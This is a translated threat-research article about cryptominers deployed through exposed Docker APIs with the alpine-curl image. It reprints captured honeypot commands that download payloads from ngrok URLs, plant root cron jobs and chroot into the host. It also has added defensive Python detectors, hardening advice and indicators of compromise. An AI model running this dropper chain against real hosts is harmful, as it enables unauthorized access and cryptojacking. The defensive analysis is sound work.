How the non-private Docker API and public images from the community are being used to distribute cryptocurrency miners

We analyzed data collected by honeypots that we set up to track threats, and detected significant activity from unwanted or unauthorized cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

Additionally, networking tools are installed to reach exposed neighboring containers and applications.

We left our honeypots as they are, that is, with default settings, without any security measures or additional software installed afterwards. Note that Docker publishes recommendations for initial setup that help avoid errors and simple vulnerabilities. The honeypots used here, however, are containers designed to detect attacks against the containerization platform itself, not against the applications inside the containers.

The detected malicious activity is also notable in that it requires no vulnerability and does not depend on the Docker version. Finding a misconfigured and therefore exposed container host is all that attackers need to infect many open servers.

An exposed Docker API allows a user to execute a wide range of commands, including listing running containers, retrieving logs from a specific container, starting and stopping containers (including forced stops), and even creating a new container from a given image with specified settings.

Figure: On the left is the malware delivery method. On the right is the attacker's environment, which allows remote image rollout.

Figure: Country breakdown of 3762 open Docker APIs, based on a Shodan search on 12.02.2019.

Attack chain and payload variants

Malicious activity was detected not only with the help of honeypots. Data from Shodan shows that the number of exposed Docker APIs (see the second graph) has increased since we investigated a misconfigured container used as a bridge to deploy Monero cryptocurrency mining software. In October of last year (2018; the current figure is shown in the second graph: translator's note) there were only 856 open APIs.

An examination of the honeypot logs showed that the use of the container image is also associated with the use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly accessible endpoints to specified addresses or resources (for example, localhost). This allows attackers to dynamically create URLs when delivering a payload to an open server. Below are examples from the logs showing abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the payload files are downloaded from constantly changing URLs. These URLs expire quickly, so the payloads cannot be retrieved after the expiration time.
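As an added example (not code from the original article or from Trend Micro), the following Python detection logic scores Docker "create container" request bodies, like the honeypot entries above, against each step of the chain just shown: a curl download into /tmp, an ngrok tunnel host, a crontab write and a chroot into a mounted host root. The request bodies are constructed, and the assumption that the host's / is bind-mounted into the container is labelled as such.

```python
import re

# Constructed Docker API "create container" request bodies modelled on the
# honeypot entries above (not the captured data itself). The first mimics the
# dropper chain; the second is an ordinary nginx deployment for contrast.
SAMPLE_CREATE_REQUESTS = [
    {"Image": "alpine-curl", "Entrypoint": "/bin/sh", "Tty": False,
     "Cmd": ["-c", 'curl --retry 3 -m 60 -o /tmpAAAA/tmp/tmpfileHASH '
                   '"hxxp://deadbeef[.]ngrok[.]io/f/serve?l=d&r=HASH";'
                   'echo "* * * * * root sh /tmp/tmpfileHASH" >/tmpAAAA/etc/crontab;'
                   'chroot /tmpAAAA sh -c "cron || crond"'],
     "HostConfig": {"Binds": ["/:/tmpAAAA"]}},
    {"Image": "nginx:1.15", "Entrypoint": None, "Tty": False,
     "Cmd": ["nginx", "-g", "daemon off;"],
     "HostConfig": {"Binds": ["web-data:/usr/share/nginx/html"]}},
]

# One indicator per step of the chain seen in the logs. Each alone can be
# benign; several together on one create request are the signature.
INDICATORS = {
    "downloader_to_tmp": re.compile(r"\b(curl|wget)\b[^;]*\s-o\s+/tmp"),
    "ngrok_tunnel": re.compile(r"ngrok\[?\.\]?io", re.I),
    "crontab_write": re.compile(r">\s*/\S*/etc/(crontab|cron\.d/)"),
    "chroot_into_mount": re.compile(r"\bchroot\s+/\S+\s+sh\b"),
}

def host_root_bound(req):
    """True if the request bind-mounts the host's / into the container
    (assumed here to be how the dropper reaches the host's /etc/crontab)."""
    binds = (req.get("HostConfig") or {}).get("Binds") or []
    return any(b.split(":")[0] == "/" for b in binds)

def score_create_request(req):
    """Names of the indicators that fire on one create request."""
    cmd = " ".join(req.get("Cmd") or [])
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if host_root_bound(req):
        hits.append("host_root_bound")
    return hits

def is_suspicious(req, threshold=2):
    """Alert when at least `threshold` independent indicators fire."""
    return len(score_create_request(req)) >= threshold
```

Feed it the JSON bodies of POST /containers/create requests from a honeypot or an API gateway log; a single indicator is a weak signal, but the dropper above fires all of them at once.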

There are two payload options. The first is a compiled Linux ELF miner (identified as Coinminer.SH.MALXMR.ATNO) that connects to the mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to obtain certain network tools used to scan network ranges and then search for new targets.

The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are located, and the RIP variable is the file name (in fact, a hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.

Figure: Examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.

Before the miner is started, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that may be present in Linux environments. This is usually enough to bypass checks against the list of running processes.
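A name-only check against the process list is exactly what the renaming defeats, so a defender's check should compare the name with where the binary actually runs from. The following Python is an added example (not the article's or Trend Micro's code) that flags processes named like a service whose executable lives in /tmp, is not the installed binary, or was deleted after launch; the process records and the expected binary paths are constructed assumptions, adjust them to your hosts.

```python
import os

# Constructed process records (not from the article): a genuine nginx,
# a miner renamed to "nginx" and started from /tmp, and a renamed binary
# that was deleted from disk after launch.
SAMPLE_PROCS = [
    {"pid": 812, "comm": "nginx", "exe": "/usr/sbin/nginx",
     "cmdline": "nginx: master process /usr/sbin/nginx"},
    {"pid": 4711, "comm": "nginx", "exe": "/tmp/tmpfileHASH/nginx",
     "cmdline": "./nginx -o stratum+tcp://pool.example:3333 -u WALLET"},
    {"pid": 4712, "comm": "nginx", "exe": "/usr/sbin/nginx (deleted)",
     "cmdline": "nginx"},
]

# Service names a dropper may borrow, mapped to where the real binary lives.
# Assumed paths: extend for the services and distributions you run.
EXPECTED_EXE = {
    "nginx": {"/usr/sbin/nginx", "/usr/local/sbin/nginx"},
    "sshd": {"/usr/sbin/sshd"},
}
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def masquerade_reasons(proc):
    """Reasons a process named like a service looks like a renamed miner."""
    expected = EXPECTED_EXE.get(proc["comm"])
    if expected is None:
        return []                        # not a name we track
    reasons, exe = [], proc["exe"]
    if exe.endswith(" (deleted)"):       # /proc/PID/exe marks unlinked binaries
        reasons.append("binary deleted after start")
        exe = exe[: -len(" (deleted)")]
    if exe.startswith(SUSPECT_DIRS):
        reasons.append("runs from world-writable dir")
    if exe not in expected:
        reasons.append(f"exe path {exe} is not the installed service")
    if "stratum" in proc["cmdline"]:     # common mining-pool URL scheme
        reasons.append("mining-pool URL in cmdline")
    return reasons

def scan_live_procs():
    """Walk /proc on a Linux host and return flagged processes with reasons."""
    flagged = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
        except OSError:
            continue                     # exited, or a kernel thread we cannot read
        proc = {"pid": int(pid), "comm": comm, "exe": exe, "cmdline": cmdline}
        reasons = masquerade_reasons(proc)
        if reasons:
            flagged.append((proc, reasons))
    return flagged
```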

The scanning script is also worth examining. It uses the same URL service to deploy the tools it needs. Among them is the zmap binary, which is used to scan networks and obtain a list of open ports. The script also downloads another binary used to interact with the discovered services and grab their banners to determine additional information about each service (for example, its version).

The script also predefines some network ranges to scan, although this depends on the version of the script. It also sets the target ports of the services being sought, in this case Docker, before starting the scan.

As soon as possible targets are found, their banners are automatically grabbed. The script also filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker client 1.16 and Apache CouchDB. If a scanned server matches any of them, it is saved in a text file that attackers can later use for further analysis and compromise. These text files are uploaded to the attackers' servers via dynamic links. That is, a separate URL is used for each file, which complicates subsequent access.

The attack vector is a Docker image, as can be seen in the next two pieces of code.

Figure: Above, renaming to a legitimate service; below, how zmap is used to scan networks.

Figure: At the top are the predefined network ranges; at the bottom are the specific ports used to search for services, including Docker.

Figure: The screenshot shows that the alpine-curl image has been downloaded over 10 million times.

A Docker image can be built from Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols. As you can see in the previous figure, this image has already been downloaded more than 10 million times. The large number of downloads may indicate that this image is used as an entry point: it was last updated more than six months ago, and users did not download other images in this repository nearly as often. In Docker, an entry point is a set of instructions used to configure a container for launch. If the entry point settings are incorrect (for example, the container is left open to the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload if they find a misconfigured or exposed container left unattended.

It is important to note that this image (alpine-curl) is not malicious in itself, but as shown above, it can be abused to perform malicious functions. Similar Docker images can also be used for malicious purposes. We have contacted Docker and have been working with them on this issue.

Recommendations

Misconfiguration remains a constant problem for many companies, especially those implementing DevOps with a focus on rapid development and delivery. This is exacerbated by the need to comply with auditing and monitoring rules, the need to protect the confidentiality of data, and the heavy damage caused by non-compliance. Incorporating security automation into the development lifecycle not only helps you find security holes that might otherwise go unnoticed, but also reduces unnecessary workload, such as running additional software builds for every vulnerability or misconfiguration discovered after an application is deployed.

The incident discussed in this article highlights the need to take security into account from the start, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: check that container images are signed and verified, restrict access to critical components (the container runtime service), and encrypt network connections.
  • Follow recommendations, such as those from Docker, and enable the built-in security features.
  • Use automated runtime and image scanning to obtain additional information about the processes running in the container (for example, to detect spoofing or find vulnerabilities). Application control and integrity monitoring help track anomalous changes to servers, files, and system areas.
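The first two recommendations come down to how the Docker daemon's own listener is configured. As an added example (not the article's or Trend Micro's code), the following Python audits a daemon.json for the exposure the honeypots observed, a plaintext TCP listener on every interface, beside a hardened configuration that binds to an internal address and requires a client certificate. Both configuration bodies are constructed; the key names (hosts, tlsverify, tlscacert, tlscert, tlskey) are the standard daemon.json keys.

```python
import json

# Constructed daemon.json contents (illustrative, not from the article).
# The weak one is the exposure the honeypots saw: a plaintext TCP listener
# on every interface, so anyone who finds it can create containers.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# The hardened one keeps remote access but binds to an internal address
# and requires TLS with a client certificate signed by the configured CA.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

ANY_ADDRESS = {"0.0.0.0", "[::]", "::"}

def audit_daemon_config(text):
    """Return findings for a daemon.json; an empty list means there is no
    remote API surface, or one that demands a client certificate."""
    cfg = json.loads(text)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return []              # Unix socket only: nothing reachable over the network
    findings = []
    if not cfg.get("tlsverify"):
        # "tls": true alone only encrypts and still accepts any client;
        # tlsverify is what makes the daemon check the client's certificate.
        findings.append("tcp listener without tlsverify: any client may control the daemon")
    else:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify set but {key} is not given explicitly")
    for h in tcp_hosts:
        addr = h[len("tcp://"):].rsplit(":", 1)[0]
        if addr in ANY_ADDRESS:
            findings.append(f"{h} listens on all interfaces; bind to an internal address or firewall it")
    return findings
```

Run it against /etc/docker/daemon.json on each host; a daemon started with -H flags on the command line instead needs the same check applied to its arguments.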

Trend Micro helps DevOps teams build securely, roll out quickly, and run anywhere. Trend Micro Hybrid Cloud Security delivers powerful, streamlined, and automated security across an organization's DevOps pipeline and provides multiple XGen threat defense techniques to protect physical, virtual and cloud workloads at runtime. It also adds container protection with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any stage of the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

On the Docker video course, practicing speakers show which settings to make first in order to minimize the likelihood of, or completely avoid, the situation described above. And on August 19-21, at the online intensive DevOps Tools & Cheats, you can discuss these and similar security problems with colleagues and practicing instructors at a round table, where everyone can speak and hear about the pains and successes of experienced colleagues.

Source: habr.com
